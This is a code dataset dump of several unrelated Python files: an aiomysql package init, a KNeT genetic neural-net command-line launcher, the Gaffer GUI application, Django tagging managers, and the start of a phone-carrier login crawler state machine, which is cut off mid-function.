code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
"""
aiomysql: A pure-Python MySQL client library for asyncio.
Copyright (c) 2010, 2013-2014 PyMySQL contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from pymysql.converters import escape_dict, escape_sequence, escape_string
from pymysql.err import (Warning, Error, InterfaceError, DataError,
DatabaseError, OperationalError, IntegrityError,
InternalError,
NotSupportedError, ProgrammingError, MySQLError)
from aio2py.required.aiomysql.connection import Connection, connect
from .cursors import Cursor, SSCursor, DictCursor, SSDictCursor
from .pool import create_pool, Pool
__version__ = '0.0.4'
__all__ = [
# Errors
'Error',
'DataError',
'DatabaseError',
'IntegrityError',
'InterfaceError',
'InternalError',
'MySQLError',
'NotSupportedError',
'OperationalError',
'ProgrammingError',
'Warning',
'escape_dict',
'escape_sequence',
'escape_string',
'__version__',
'Connection',
'Pool'
'connect',
'create_pool',
'Cursor',
'SSCursor',
'DictCursor',
'SSDictCursor'
]
(Connection, Pool, connect, create_pool, Cursor, SSCursor, DictCursor,
SSDictCursor) # pyflakes
|
lfblogs/aio2py
|
aio2py/required/aiomysql/__init__.py
|
Python
|
apache-2.0
| 2,232
|
# -*- coding: utf-8 -*-
#MIT License
#Copyright (c) 2017 Marton Kelemen
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
# Dependencies:
# numpy
# scipy
# https://docs.python.org/3/library/argparse.html
#https://docs.python.org/3/howto/argparse.html
import argparse
#from com.application.logic.knet import knet_manager
from com.application.logic.knet import knet_manager_pytorch
#from com.application.logic.knet import knet_manager_keras
import os
import gc
def set_Threads(args) :
if args.threads is not None :
os.environ['MKL_NUM_THREADS'] = args.threads # '16' # use h ere the N , where N: the number of cores acailable or limit to 1
os.environ['MKL_DYNAMIC'] = 'FALSE'
os.environ['OMP_NUM_THREADS'] = '1'
print("set MKL number of threads to: " + str(args.threads))
def set_nixMem(args) :
if args.nixMem is not None :
import resource # this only exists on Unix/Linux based systems
rsrc = resource.RLIMIT_AS
soft, hard = resource.getrlimit(rsrc)
print('Soft limit starts as :', soft)
print('Hard limit starts as :', hard)
resource.setrlimit(rsrc, (args.nixMem * 1048576, hard)) #limit
soft, hard = resource.getrlimit(rsrc)
print('Soft limit changed to :', soft)
print('Hard limit changed to :', hard)
def runKnet(args) :
print('Knet Neural net started')
set_Threads(args)
set_nixMem(args)
knet_manager_pytorch.runKnet(args)
# the below will cause import errors
#if int(args.keras) == 1 : knet_manager_keras.runKnet(args)
#elif int(args.pytorch) == 1 : knet_manager_pytorch.runKnet(args)
#else : knet_manager.runKnet(args)
gc.collect()
##################################################################################################
# setup COmmand line parser
##################################################################################################
parser = argparse.ArgumentParser()
# overall
parser.add_argument("--out",required=True, help='an output location is always required')
parser.add_argument("--threads",required=False, help='set number of threads used by multithreaded operations')
parser.add_argument("--nixMem",required=False, type=int, help='Memory limit for *nix based systems in Megabytes')
subparsers = parser.add_subparsers()
subparsers.required = True
subparsers.dest = 'either knet, scanner, h2, kinship, kinmerge or merge' # hack to make subparser required
# create the parser for the "a" command
parser_knet = subparsers.add_parser('knet')
parser_knet.add_argument('--knet', required=True) # the location of the train set binaries
parser_knet.add_argument("--pheno", required=True)
parser_knet.set_defaults(func=runKnet)
# knet subparams
parser_knet.add_argument("--loadWeights") # from where we want to load the weights
parser_knet.add_argument("--saveWeights") # where we wnt to save weights
parser_knet.add_argument("--savFreq", default=-1, type=int) # how frequently we make backups of Weights
parser_knet.add_argument("--epochs", default=100, type=int) # how many epochs
parser_knet.add_argument("--learnRate", default=0.005, type=float)
parser_knet.add_argument("--momentum", default=-1, type=float) # -1 means 'disabled'
parser_knet.add_argument("--validSet") # the location for the binaries for the validation set
parser_knet.add_argument("--validPhen") # the location for the binaries for the validation set phenotypes
parser_knet.add_argument("--evalFreq", default=10, type=int) # how frequently we evaluate prediction accuracy (-1 for disabled)
parser_knet.add_argument("--cc", type=int) # ,required=False # if phenotype is case control
parser_knet.add_argument("--recodecc", type=int) # ,required=False # if we want to recode case control to quantitative
parser_knet.add_argument("--randomSeed", default=1, type=int)
parser_knet.add_argument("--hidCount", default=0, type=int) # number of hidden layers
parser_knet.add_argument("--hidAct", default=0, type=int) # the hidden layer activations ( 1 = sigmoid, 2 = RELU, 3 = linear, 4 = softplus, 5 = LeakyReLU, 6 =SELU)
parser_knet.add_argument("--batch_size", default=0, type=int) # the size of the minibatches, use 0 for no minibatches (IE train all at once)
parser_knet.add_argument("--bnorm", default=1, type=int) # if (spatial) batch normalization is enabled (1) or not (0)
parser_knet.add_argument("--lr_decay", default=0, type=int) # learning rate decay should be enabled (1) or not (0)
parser_knet.add_argument("--optimizer", default=0, type=int) # the optimizer, 0 for SGD (the default), 1 for ADAM, and 2 for AMSGrad
parser_knet.add_argument("--float", default=64, type=int) # the float precision, valid options are 16, 32 and 64 (the default)
parser_knet.add_argument("--inference", default=0, type=int) # if an Inference (ie deep dreaming) run is to be performed (1) or training run should be performed (0)
parser_knet.add_argument("--orig", default=0, type=int)
parser_knet.add_argument("--firstLayerSize", default=1000, type=int) # the number of units in the first layer
parser_knet.add_argument("--dropout", default=-1, type=float) # % of units to switch off at each iteration
parser_knet.add_argument("--snpIndices")
parser_knet.add_argument("--mns")
parser_knet.add_argument("--sstd")
parser_knet.add_argument("--snpIDs")
parser_knet.add_argument("--convLayers", default=0, type=int) # how many convolutional layers to add (0 for disabled)
parser_knet.add_argument("--convFilters", default=500, type=int) # the number of filters that we will use in the first layer, each subsequent layer will have i * this many filters
parser_knet.add_argument("--widthReductionRate", default=1, type=int) # The rate at which the network 'thins' IE if we start at 1000 neurons in layer 1, then at rate of 1 (default), we half it every layer, with a rate of 2, it will half every second layer Ie we will get two layers with 1000 units each, and then two 500 units etc
parser_knet.add_argument("--keras",required=False, help='to run keras/tensorflow backend (1) instead of original KNeT', default=0, type=int)
parser_knet.add_argument("--pytorch",required=False, help='to run pytorch backend (1) instead of original KNeT', default=0, type=int)
parser_knet.add_argument("--gpu",required=False, help='...', default=0, type=int)
# parser_knet.add_argument("--topology", required=True) # the location of the file that describes the network's topology (IE number and size of layers etc)
parser_knet.add_argument("--predictPheno", default=-1, type=int) # if network should save phenotype predictions to a location at the end, for a validation set
parser_knet.add_argument("--num_CPU", default=1, type=int) # the number of CPU cores Keras should use
parser_knet.add_argument("--qc", default=1, type=int) # if SNP QC is to be performed
parser_knet.add_argument("--decov", default=0.0, type=float) # if decov regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--hidl2", default=0.0, type=float) # the L2 regularizer shrinkage param
parser_knet.add_argument("--l1", default=0.0, type=float) # if l1 regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--ortho", default=0.0, type=float) # if ortho v1 regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--orthov2", default=0.0, type=float) # if ortho v2 regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--inf_neurons", default=-1, type=int) # if an inference layer should be added with a given size or not (-1)
parser_knet.add_argument("--hyperopt", default=0, type=int) # if best parameter settings are to be found via hyperopt semi-random search
parser_knet.add_argument("--earlystop", default=0, type=int) # if early stop is to be applied (1) or not (0)
parser_knet.add_argument("--linearInference", default=0, type=int) # if the activation functions should be switched off (1) for inference or not (0)
parser_knet.add_argument("--oversampling") # from where we want to load the file containing all the cases
# retreive command line arguments
args = parser.parse_args()
args.func(args)
# toy test
# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/toyregions_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy --pheno /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy.pheno --saveEigSum /nfs/users/nfs_m/mk23/test/pytest/toyeig
# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22_s100t_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/test/pytest/f1/22_toy_long --filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno
##################################################################################################
##################################################################################################
# Local Tests
#
## KNET MAIN
#args = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
## Knet main as case control one hot
#args = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '0.2' , '--hidAct' , '2' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
#
# --saveWeights
# --savFreq
# LOCAL TEST
#from com.io import knet_IO
#from com.application.utils import geno_qc
#from com.application.utils import plotgen
#args = parser.parse_args(['--out', 'C:/0Datasets/knet_tempoutput/' ,'knet', '--knet', '../data/genetic/short', '--pheno', '../data/genetic/phen.pheno', '--epochs', '21', '--learnRate', '0.0001', '--momentum', '0.9', '--evalFreq', '1', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0', '--saveWeights', 'C:/0Datasets/knet_tempoutput/w/', '--evalFreq', '1' , '--convFilters', '200', '--convLayers', '0', '--firstLayerSize' , '500' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
#
#args = parser.parse_args(['--out', '../data/results/' ,'knet', '--knet', '../data/genetic/short', '--pheno', '../data/genetic/phen.pheno', '--oversampling', '../data/genetic/cases.txt', '--epochs', '21', '--learnRate', '0.0001', '--momentum', '0.9', '--evalFreq', '10', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
#
#
#
#
#
#
#
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv/ --threads 10 knet --knet /root/mk23/data/genetic/short --epochs 21 --saveWeights /root/mk23/results/knet_conv/weights/ --learnRate 0.00005 --momentum .9 --pheno /root/mk23/data/genetic/phen.pheno --recodecc 0 --cc 0 --hidAct 2 > /root/mk23/results/knet_conv.txt
# GPU run
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_new/ knet --knet /root/mk23/data/genetic/short --gpu 1 --epochs 1 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_new/weights/ --learnRate 0.00005 --momentum .9 --pheno /root/mk23/data/genetic/phenew.pheno.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 > /root/mk23/results/knet_conv_new.txt
# Inference on real data
#args = parser.parse_args(['--out', 'C:/0Datasets/NNs/genetic/inference/' ,'knet', '--knet', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/short', '--pheno', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/phenew.pheno.phen', '--epochs', '21', '--learnRate', '0.00005', '--momentum', '0.9', '--evalFreq', '1', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0' ,'--inference', '1' ,'--loadWeights', 'C:/0Datasets/NNs/genetic/weights/' ,'--snpIndices', 'C:/0Datasets/NNs/genetic/nn_SNPs_indices.txt' ,'--mns', 'C:/0Datasets/NNs/genetic/data_mns','--sstd', 'C:/0Datasets/NNs/genetic/data_sstd','--snpIDs', 'C:/0Datasets/NNs/genetic/nn_SNPs.txt' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
# GPU run on simulated data
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim/ knet --knet /root/mk23/data/genetic/simgeno_out --gpu 1 --epochs 81 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim/weights/ --learnRate 0.00005 --momentum .9 --pheno /root/mk23/data/genetic/simphe.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 > /root/mk23/results/knet_conv_sim.txt
# Inference on sim data
# args = parser.parse_args(['--out', 'C:/0Datasets/NNs/genetic/inference/' ,'knet', '--knet', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/simgeno_out', '--pheno', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/simphe.phen', '--epochs', '21', '--learnRate', '0.00005', '--momentum', '0.9', '--evalFreq', '1', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0' ,'--inference', '1' ,'--loadWeights', 'C:/0Datasets/NNs/genetic/weights/' ,'--snpIndices', 'C:/0Datasets/NNs/genetic/nn_SNPs_indices.txt' ,'--mns', 'C:/0Datasets/NNs/genetic/data_mns','--sstd', 'C:/0Datasets/NNs/genetic/data_sstd','--snpIDs', 'C:/0Datasets/NNs/genetic/nn_SNPs.txt' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
# GPU run on simulated data with simulated validation data
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val/ knet --knet /root/mk23/data/genetic/train_data --gpu 1 --epochs 501 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val/weights/ --learnRate 0.00001 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train.phen --validSet /root/mk23/data/genetic/test_data --validPhen /root/mk23/data/genetic/simphe_2x_test.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val.txt
# GPU run on simulated data with simulated validation data, that has only 5200 SNPs
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val_5200/ knet --knet /root/mk23/data/genetic/train_data_5200 --gpu 1 --epochs 101 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val_5200/weights/ --learnRate 0.001 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train_5200.phen --validSet /root/mk23/data/genetic/test_data_5200 --validPhen /root/mk23/data/genetic/simphe_2x_test_5200.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.00 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val_5200.txt
# GPU run on simulated data with simulated validation data, that has only 5200 SNPs, where 50% is causal, IE massively polygenic
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val_5200_MP/ knet --knet /root/mk23/data/genetic/train_data_5200 --gpu 1 --epochs 101 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val_5200_MP/weights/ --learnRate 0.0005 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train_5200_MP.phen --validSet /root/mk23/data/genetic/test_data_5200 --validPhen /root/mk23/data/genetic/simphe_2x_test_5200_MP.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val_5200_MP.txt
# This produces a 7% r^2
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val_5200_MP/ knet --knet /root/mk23/data/genetic/train_data_5200 --gpu 1 --epochs 101 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val_5200_MP/weights/ --learnRate 0.0005 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train_5200_MP.phen --validSet /root/mk23/data/genetic/test_data_5200 --validPhen /root/mk23/data/genetic/simphe_2x_test_5200_MP.phen --recodecc 0 --cc 0 --hidAct 3 --hidl2 0.5 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val_5200_MP.txt
#
#from com.application.logic.knet import knet_main
#from com.application.utils import plotgen
#from com.application.utils import geno_qc
#from com.io import knet_IO
#from com.application.utils. geno_qc import removeList, genoQC_all, standardise_Genotypes, getSizeInMBs
#
#import importlib
#from types import ModuleType
## recursively reload modules / submodules up until a certain depth ( if 2 deep it will crash or try to reload static/built in modules)
#def rreload(module, maxDepth = 2, depth = 0):
# importlib.reload(module)
# depth = depth +1
# if(depth < maxDepth) :
# for attribute_name in dir(module):
# attribute = getattr(module, attribute_name)
# if type(attribute) is ModuleType:
# rreload(attribute, maxDepth, depth)
#
#
#rreload(knet_IO)
#rreload(geno_qc)
#rreload(knet_main)
#
#
##
#import importlib
#importlib.reload(geno_qc)
#
# sometimes reloading modules will fail... only solution is to restart kernel:
# http://justus.science/blog/2015/04/19/sys.modules-is-dangerous.html
|
mkelcb/knet
|
knet/knet_pytorch.py
|
Python
|
mit
| 19,243
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import gc
import functools
import IECore
import Gaffer
import GafferUI
class gui( Gaffer.Application ) :
def __init__( self ) :
Gaffer.Application.__init__(
self,
"""
A graphical user interface for editing node graphs. This is
the primary user facing Gaffer application.
"""
)
self.parameters().addParameters(
[
IECore.StringVectorParameter(
name = "scripts",
description = "A list of scripts to edit.",
defaultValue = IECore.StringVectorData(),
),
IECore.BoolParameter(
name = "fullScreen",
description = "Opens the UI in full screen mode.",
defaultValue = False,
),
]
)
self.parameters().userData()["parser"] = IECore.CompoundObject(
{
"flagless" : IECore.StringVectorData( [ "scripts" ] )
}
)
self.__setupClipboardSync()
def _run( self, args ) :
GafferUI.ScriptWindow.connect( self.root() )
# Must start the event loop before adding scripts,
# because `FileMenu.addScript()` may launch
# interactive dialogues.
GafferUI.EventLoop.addIdleCallback( functools.partial( self.__addScripts, args ) )
GafferUI.EventLoop.mainEventLoop().start()
return 0
def __addScripts( self, args ) :
if len( args["scripts"] ) :
for fileName in args["scripts"] :
GafferUI.FileMenu.addScript( self.root(), fileName )
if not len( self.root()["scripts"] ) :
# Loading was cancelled, in which case we should quit the app.
GafferUI.EventLoop.mainEventLoop().stop()
return False # Remove idle callback
else :
scriptNode = Gaffer.ScriptNode()
Gaffer.NodeAlgo.applyUserDefaults( scriptNode )
self.root()["scripts"].addChild( scriptNode )
if args["fullScreen"].value :
primaryScript = self.root()["scripts"][-1]
primaryWindow = GafferUI.ScriptWindow.acquire( primaryScript )
primaryWindow.setFullScreen( True )
return False # Remove idle callback
def __setupClipboardSync( self ) :
## This function sets up two way syncing between the clipboard held in the Gaffer::ApplicationRoot
# and the global QtGui.QClipboard which is shared with external applications, and used by the cut and paste
# operations in GafferUI's underlying QWidgets. This is very useful, as it allows nodes to be copied from
# the graph and pasted into emails/chats etc, and then copied out of emails/chats and pasted into the node graph.
#
## \todo I don't think this is the ideal place for this functionality. Firstly, we need it in all apps
# rather than just the gui app. Secondly, we want a way of using the global clipboard using GafferUI
# public functions without needing an ApplicationRoot. Thirdly, it's questionable that ApplicationRoot should
# have a clipboard anyway - it seems like a violation of separation between the gui and non-gui libraries.
# Perhaps we should abolish the ApplicationRoot clipboard and the ScriptNode cut/copy/paste routines, relegating
# them all to GafferUI functionality?
from Qt import QtWidgets
self.__clipboardContentsChangedConnection = self.root().clipboardContentsChangedSignal().connect( Gaffer.WeakMethod( self.__clipboardContentsChanged ) )
QtWidgets.QApplication.clipboard().dataChanged.connect( Gaffer.WeakMethod( self.__qtClipboardContentsChanged ) )
self.__ignoreQtClipboardContentsChanged = False
self.__qtClipboardContentsChanged() # Trigger initial sync
def __clipboardContentsChanged( self, applicationRoot ) :
assert( applicationRoot.isSame( self.root() ) )
data = applicationRoot.getClipboardContents()
from Qt import QtWidgets
clipboard = QtWidgets.QApplication.clipboard()
try :
self.__ignoreQtClipboardContentsChanged = True # avoid triggering an unecessary copy back in __qtClipboardContentsChanged
clipboard.setText( str( data ) )
finally :
self.__ignoreQtClipboardContentsChanged = False
def __qtClipboardContentsChanged( self ) :
if self.__ignoreQtClipboardContentsChanged :
return
from Qt import QtWidgets
text = QtWidgets.QApplication.clipboard().text().encode( "utf-8" )
if text :
with Gaffer.BlockedConnection( self.__clipboardContentsChangedConnection ) :
self.root().setClipboardContents( IECore.StringData( text ) )
IECore.registerRunTimeTyped( gui )
|
andrewkaufman/gaffer
|
apps/gui/gui-1.py
|
Python
|
bsd-3-clause
| 6,109
|
"""
Custom managers for Django models registered with the tagging
application.
"""
from django.contrib.contenttypes.models import ContentType
from django.db import models
class ModelTagManager(models.Manager):
"""
A manager for retrieving tags for a particular model.
"""
def __init__(self, tag_model):
super(ModelTagManager, self).__init__()
self.tag_model = tag_model
def get_query_set(self):
content_type = ContentType.objects.get_for_model(self.model)
return self.tag_model.objects.filter(
items__content_type__pk=content_type.pk).distinct()
def related(self, tags, *args, **kwargs):
return self.tag_model.objects.related_for_model(tags, self.model, *args, **kwargs)
def usage(self, *args, **kwargs):
return self.tag_model.objects.usage_for_model(self.model, *args, **kwargs)
class ModelTaggedItemManager(models.Manager):
"""
A manager for retrieving model instances based on their tags.
"""
def __init__(self, tag_model):
super(ModelTaggedItemManager, self).__init__()
self.intermediary_table_model = tag_model.objects.intermediary_table_model
def related_to(self, obj, queryset=None, num=None):
if queryset is None:
return self.intermediary_table_model.objects.get_related(obj, self.model, num=num)
else:
return self.intermediary_table_model.objects.get_related(obj, queryset, num=num)
def with_all(self, tags, queryset=None):
if queryset is None:
return self.intermediary_table_model.objects.get_by_model(self.model, tags)
else:
return self.intermediary_table_model.objects.get_by_model(queryset, tags)
def with_any(self, tags, queryset=None):
if queryset is None:
return self.intermediary_table_model.objects.get_union_by_model(self.model, tags)
else:
return self.intermediary_table_model.objects.get_union_by_model(queryset, tags)
class TagDescriptor(object):
"""
A descriptor which provides access to a ``ModelTagManager`` for
model classes and simple retrieval, updating and deletion of tags
for model instances.
"""
def __init__(self, tag_model):
self.tag_model = tag_model
def __get__(self, instance, owner):
if not instance:
tag_manager = ModelTagManager(self.tag_model)
tag_manager.model = owner
return tag_manager
else:
return self.tag_model.objects.get_for_object(instance)
def __set__(self, instance, value):
self.tag_model.objects.update_tags(instance, value)
def __del__(self, instance):
self.tag_model.objects.update_tags(instance, [])
|
mstepniowski/django-newtagging
|
newtagging/managers.py
|
Python
|
mit
| 2,765
|
# -*- coding: utf-8 -*-
import sys
import time
import inspect
import traceback
from base_state import BaseState
from state_tool import after_get_parameter, SUCCESS_STATUS, FAILED_STATUS
from setting.status_code import STATUS_CODE
from setting.api_config import ENV, STATE_TIME_OUT, CRAWLER_TIME_OUT
from worker.communicate import get_parameter, save_data, save_status, get_today_result
from worker.call_log_data_fusion import data_fusion as call_log_fusion
from worker.bill_data_fusion import data_fusion as bill_fusion
import copy
class StartState(BaseState):
def __init__(self, **kwargs):
super(StartState, self).__init__(**kwargs)
self.parameters['tel'] = kwargs['tel']
self.login_verify_type = \
self.crawler.get_login_verify_type(**self.parameters)
self.need_parameters = \
self.crawler.need_parameters(**self.parameters)
need_parameters_dict = {'need_full_name': 0,
'need_id_card': 0,
'need_pin_pwd': 0,
'need_sms_verify': 0,
'need_captcha_verify': 0}
for parameter in self.need_parameters:
need_parameters_dict['need_{}'.format(parameter)] = 1
self.need_parameters = need_parameters_dict
self.cache_time = get_today_result(self.parameters['tel'])
self.set_current_state(receive=True)
def execute(self, **kwargs):
status = STATUS_CODE[SUCCESS_STATUS]
self.execute_message = status['message']
self.execute_status = status['status']
if not self.login_verify_type:
self.state_flag = 'WaitLogin'
else:
self.state_flag = 'WaitLoginVerifyRequest'
self.log()
class WaitLoginVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(WaitLoginVerifyRequestState, self).__init__(**kwargs)
self.next_action = 'Get{}'.format(self.login_verify_type)
self.set_current_state()
def execute(self, **kwargs):
targets = [self.next_action]
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
self.parameters.update(parameters)
if not state_flag:
self.state_flag = 'UnderLoginVerifyRequest'
else:
self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderLoginVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(UnderLoginVerifyRequestState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key, image_str = self.crawler.send_login_verify_request(**self.parameters)
time_used = int(time.time()) - start_time
if code == 0 and time_used < STATE_TIME_OUT:
status_code = STATUS_CODE[SUCCESS_STATUS]
self.state_flag = 'WaitLogin'
else:
status_code = STATUS_CODE[key]
if time_used > STATE_TIME_OUT:
self.log(message='time_used:{}'.format(time_used))
status_code = STATUS_CODE[FAILED_STATUS]
self.state_flag = 'Failed'
self.verify_content = image_str
self.execute_status = status_code['status']
self.execute_message= status_code['message']
self.log()
class WaitLoginState(BaseState):
def __init__(self, **kwargs):
super(WaitLoginState, self).__init__(**kwargs)
self.next_action = 'Login'
self.set_current_state()
def execute(self, **kwargs):
send_target = 'Get{}'.format(self.login_verify_type)
targets = [self.next_action, send_target]
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
self.parameters.update(parameters)
if not state_flag:
if action == send_target:
self.state_flag = 'UnderLoginVerifyRequest'
else:
self.state_flag = 'UnderLogin'
else:
self.state_flag = state_flag
self.execute_status = status_code['status']
self.execute_message = status_code['message']
self.log()
class UnderLoginState(BaseState):
def __init__(self, **kwargs):
super(UnderLoginState, self).__init__(**kwargs)
self.set_current_state(receive=True)
def execute(self, **kwargs):
start_time = int(time.time())
code, key = self.crawler.login(**self.parameters)
time_used = int(time.time()) - start_time
